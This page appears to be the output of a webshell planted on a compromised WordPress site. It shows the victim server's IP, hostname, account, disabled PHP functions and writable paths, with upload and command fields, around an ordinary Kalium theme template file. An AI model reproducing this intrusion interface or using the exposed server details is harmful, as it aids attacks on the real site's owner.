403Webshell
Server IP : 5.144.175.180  /  Your IP : 216.73.216.131
Web Server : Apache/2.4.63 (Unix) OpenSSL/1.1.1
System : Linux vpsgpz1.itsimplycom.it 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64
User : edilchimica ( )
PHP Version : 7.4.33
Disable Function : getmyuid,passthru,leak,listen,diskfreespace,tmpfile,link,shell_exec,dl,exec,system,highlight_file,source,show_source,fpassthru,virtual,posix_ctermid,posix_getcwd,posix_getegid,posix_geteuid,posix_getgid,posix_getgrgid,posix_getgrnam,posix_getgroups,posix_getlogin,posix_getpgid,posix_getpgrp,posix_getpid,posix_getppid,posix_getpwuid,posix_getrlimit,posix_getsid,posix_getuid,posix_isatty,posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid,posix_setpgid,posix_setsid,posix_setuid,posix_times,posix_ttyname,posix_uname,proc_open,proc_close,proc_nice,proc_terminate,escapeshellcmd,ini_alter,popen,pcntl_exec,socket_accept,socket_bind,socket_clear_error,socket_close,socket_connect,symlink,posix_geteuid,ini_alter,socket_listen,socket_create_listen,socket_read,socket_create_pair,stream_socket_server
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/edilchimica/webapps/edilchimica/wp-content/themes/edilchimica/tpls/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/edilchimica/webapps/edilchimica/wp-content/themes/edilchimica/tpls/portfolio-single-2.php
<?php
/**
 * Kalium WordPress Theme
 *
 * Laborator.co
 * www.laborator.co
 *
 * @deprecated 3.0 This template file will be removed or replaced with new one in templates/ folder.
 */
if ( ! defined( 'ABSPATH' ) ) {
	exit; // Direct access not allowed.
}

include locate_template( 'tpls/portfolio-single-item-details.php' );

$has_services_section      = $launch_link_href || count( $checklists );
$is_centered               = $layout_type == 'centered';
$gallery_above_description = 'above-description' === $gallery_position;

kalium_enqueue( 'nivo' );

// Title Markup (Save as buffered output)
ob_start();

?>
<div class="title section-title<?php echo $is_centered ? ' text-on-center' : ''; ?>">
    <h1><?php the_title(); ?></h1>
	<?php if ( $sub_title ) : ?>
        <p><?php echo wp_kses_post( $sub_title ); ?></p>
	<?php endif; ?>

	<?php if ( $is_centered ) : ?>
        <div class="dash small"></div>
	<?php endif; ?>
</div>
<?php

$item_title = ob_get_clean();

// Columns Gap
if ( $gallery_columns_gap ) {
	kalium_portfolio_generate_gallery_gap( $gallery_columns_gap );
}

do_action( 'kalium_portfolio_item_before', 'type-2' );
?>
<div class="container">

    <div class="page-container">
        <div class="single-portfolio-holder portfolio-type-2<?php when_match( $is_centered, 'portfolio-centered-layout alt-six', 'alt-four' ); ?>">

			<?php
			if ( apply_filters( 'kalium_portfolio_item_columned_show_title_above', $title_position == 'before' ) ) {
				echo $item_title;
			}
			?>

			<?php
			if ( $show_featured_image && $has_thumbnail && $post_thumbnail_id ) :

				$featured_image = get_post( $post_thumbnail_id );
				$caption = $featured_image->post_excerpt;

				$fi_href = $featured_image->guid;
				$fi_alt  = $featured_image->_wp_attachment_image_alt;

				$is_video = $fi_alt && preg_match( '/(youtube\.com|vimeo\.com)/i', $fi_alt );

				$fi_classes = array( 'portfolio-featured-image' );

				if ( $fullwidth_featured_image ) {
					$fi_classes[] = 'full-width-container';
				}

				switch ( $images_reveal_effect ) {
					case 'slidenfade':
						$fi_classes[] = 'wow fadeInLab';
						break;

					case 'fade':
						$fi_classes[] = 'wow fadeIn';
						break;
				}
				?>
                <div class="<?php echo implode( ' ', $fi_classes ); ?>">

                    <a href="<?php echo $is_video ? esc_url( $fi_alt ) : esc_url( $fi_href ); ?>" class="nivo" data-lightbox-gallery="post-gallery">
						<?php echo kalium_get_attachment_image_raw( $post_thumbnail_id, apply_filters( 'kalium_single_portfolio_gallery_image', 'portfolio-single-img-1' ) ); ?>
                    </a>

					<?php if ( $caption ): ?>
                        <div class="caption">
							<?php echo nl2br( wp_kses_post( $caption ) ); ?>
                        </div>
					<?php endif; ?>
                </div>
			<?php
			endif;
			?>

			<?php
			do_action( 'kalium_portfolio_type_columned_before_gallery' );
			?>

			<?php if ( $gallery_above_description ) : ?>
                <div class="col-sm-12 gallery-above">
					<?php include locate_template( 'tpls/portfolio-gallery.php' ); ?>
                </div>
			<?php endif; ?>

			<?php
			if ( apply_filters( 'kalium_portfolio_item_columned_show_title_below', $title_position != 'before' ) ) {
				echo $item_title;
			}
			?>

            <div class="details row">
                <div class="<?php echo $has_services_section && $is_centered == false ? 'col-sm-8' : 'col-sm-12'; ?>">
                    <div class="project-description">
                        <div class="post-formatting">
							<?php the_content(); ?>
                        </div>
                    </div>
                </div>

				<?php if ( $has_services_section && $is_centered == false ) : ?>
                    <div class="col-sm-3 col-sm-offset-1">
                        <div class="services">
							<?php include locate_template( 'tpls/portfolio-checklists.php' ); ?>

							<?php include locate_template( 'tpls/portfolio-launch-project.php' ); ?>
                        </div>
                    </div>
				<?php endif; ?>

				<?php
				if ( $share_and_like_position == 'before' ) {
					?>
                    <div class="col-sm-12">
						<?php include locate_template( 'tpls/portfolio-single-like-share.php' ); ?>
                    </div>
					<?php
				}
				?>

				<?php if ( $has_services_section && $is_centered == true ) : ?>
                    <div class="col-sm-12 inline-checklists">

						<?php include locate_template( 'tpls/portfolio-checklists.php' ); ?>

						<?php include locate_template( 'tpls/portfolio-launch-project.php' ); ?>

                    </div>
				<?php endif; ?>
            </div>

			<?php if ( ! $gallery_above_description ) : ?>
                <div class="col-sm-12">
					<?php include locate_template( 'tpls/portfolio-gallery.php' ); ?>
                </div>
			<?php endif; ?>

			<?php
			if ( $share_and_like_position == 'after' ) {
				?>
                <div class="row">
                    <div class="col-sm-12">
						<?php include locate_template( 'tpls/portfolio-single-like-share.php' ); ?>
                    </div>
                </div>
				<?php
			}
			?>

			<?php include locate_template( 'tpls/portfolio-single-prevnext.php' ); ?>
        </div>
    </div>

</div>

Youez - 2016 - github.com/yon3zu
LinuXploit